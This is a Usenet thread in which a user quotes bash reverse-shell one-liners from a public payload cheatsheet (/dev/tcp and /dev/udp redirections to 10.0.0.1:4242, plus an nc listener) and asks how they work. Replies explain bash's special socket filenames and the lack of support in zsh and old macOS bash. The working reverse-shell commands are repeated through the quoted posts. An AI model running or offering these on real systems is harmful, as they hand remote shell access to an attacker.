Discussion:
Reverse tcp/udp Shell with bash.
(too old to reply)
hongy...@gmail.com
2021-03-05 01:57:31 UTC
Permalink
On this webpage <https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#reverse-shell>, I noticed the following methods to get the reverse shell of tcp/udp with bash

<quote>
Bash TCP

bash -i >& /dev/tcp/10.0.0.1/4242 0>&1

0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196

Bash UDP

Victim:
sh -i >& /dev/udp/10.0.0.1/4242 0>&1

Listener:
nc -u -lvp 4242
</quote>

I try to understand the mechanism of the above codes but still not quite clear about the communication process. OTOH, why the nc is used for the udp case whereas the method for the tcp case is implemented purely based on I/O redirection?

Regards,
HY
Luuk
2021-03-05 16:55:20 UTC
Permalink
Post by ***@gmail.com
On this webpage <https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#reverse-shell>, I noticed the following methods to get the reverse shell of tcp/udp with bash
<quote>
Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
Bash UDP
sh -i >& /dev/udp/10.0.0.1/4242 0>&1
nc -u -lvp 4242
</quote>
I try to understand the mechanism of the above codes but still not quite clear about the communication process. OTOH, why the nc is used for the udp case whereas the method for the tcp case is implemented purely based on I/O redirection?
Regards,
HY
% sh -i >& /dev/udp/10.0.0.1/4242 0>&1
zsh: no such file or directory: /dev/udp/10.0.0.1/4242
--
Luuk
Lew Pitcher
2021-03-05 17:52:24 UTC
Permalink
Post by ***@gmail.com
Post by ***@gmail.com
On this webpage
<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/
Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#reverse-
shell>,
Post by ***@gmail.com
Post by ***@gmail.com
I noticed the following methods to get the reverse shell of tcp/udp
with bash
<quote>
Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
Bash UDP
sh -i >& /dev/udp/10.0.0.1/4242 0>&1
nc -u -lvp 4242 </quote>
I try to understand the mechanism of the above codes but still not
quite clear about the communication process. OTOH, why the nc is used
for the udp case whereas the method for the tcp case is implemented
purely based on I/O redirection?
Regards,
HY
/dev/udp/10.0.0.1/4242
From bash(1) manpage:

Bash handles several filenames specially when they are used in
redirections, as described in the following table

...

/dev/tcp/host/port
If host is a valid hostname or Internet address, and port
is an integer port number or service name, bash attempts
to open the corresponding TCP socket.

/dev/udp/host/port
If host is a valid hostname or Internet address, and port
is an integer port number or service name, bash attempts
to open the corresponding UDP socket.

AFAICT, zsh does not support this form of redirection.
--
Lew Pitcher
"In Skills, We Trust"
Luuk
2021-03-10 08:57:26 UTC
Permalink
Post by ***@gmail.com
Post by ***@gmail.com
Post by ***@gmail.com
On this webpage
<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/
Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#reverse-
shell>,
Post by ***@gmail.com
Post by ***@gmail.com
I noticed the following methods to get the reverse shell of tcp/udp
with bash
<quote>
Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
Bash UDP
sh -i >& /dev/udp/10.0.0.1/4242 0>&1
nc -u -lvp 4242 </quote>
I try to understand the mechanism of the above codes but still not
quite clear about the communication process. OTOH, why the nc is used
for the udp case whereas the method for the tcp case is implemented
purely based on I/O redirection?
Regards,
HY
/dev/udp/10.0.0.1/4242
Bash handles several filenames specially when they are used in
redirections, as described in the following table
...
/dev/tcp/host/port
If host is a valid hostname or Internet address, and port
is an integer port number or service name, bash attempts
to open the corresponding TCP socket.
/dev/udp/host/port
If host is a valid hostname or Internet address, and port
is an integer port number or service name, bash attempts
to open the corresponding UDP socket.
AFAICT, zsh does not support this form of redirection.
or, apple does not support it, and has a bas implementation of bash.

% sh --version
GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin19)
Copyright (C) 2007 Free Software Foundation, Inc.
--
Luuk
Barry Margolin
2021-03-13 06:47:42 UTC
Permalink
Post by Luuk
or, apple does not support it, and has a bas implementation of bash.
% sh --version
GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin19)
Copyright (C) 2007 Free Software Foundation, Inc.
IIRC, Apple stopped updating GNU applications to versions that were
released with a later version of the GPL that they don't agree with. So
we're stuck with years-old versions like this.
--
Barry Margolin, ***@alum.mit.edu
Arlington, MA
*** PLEASE post questions in newsgroups, not directly to me ***
Ottavio Caruso
2021-03-13 09:44:14 UTC
Permalink
Post by Barry Margolin
Post by Luuk
or, apple does not support it, and has a bas implementation of bash.
% sh --version
GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin19)
Copyright (C) 2007 Free Software Foundation, Inc.
IIRC, Apple stopped updating GNU applications to versions that were
released with a later version of the GPL that they don't agree with. So
we're stuck with years-old versions like this.
You can always (re)compile bash on Darwin with pkgsrc. It's well
supported and I believe one NetBSD developer also provides ready made
binaries. I can investigate the matter, if needed. I haven't got the
links to the binaries right now.
--
Ottavio Caruso
Loading...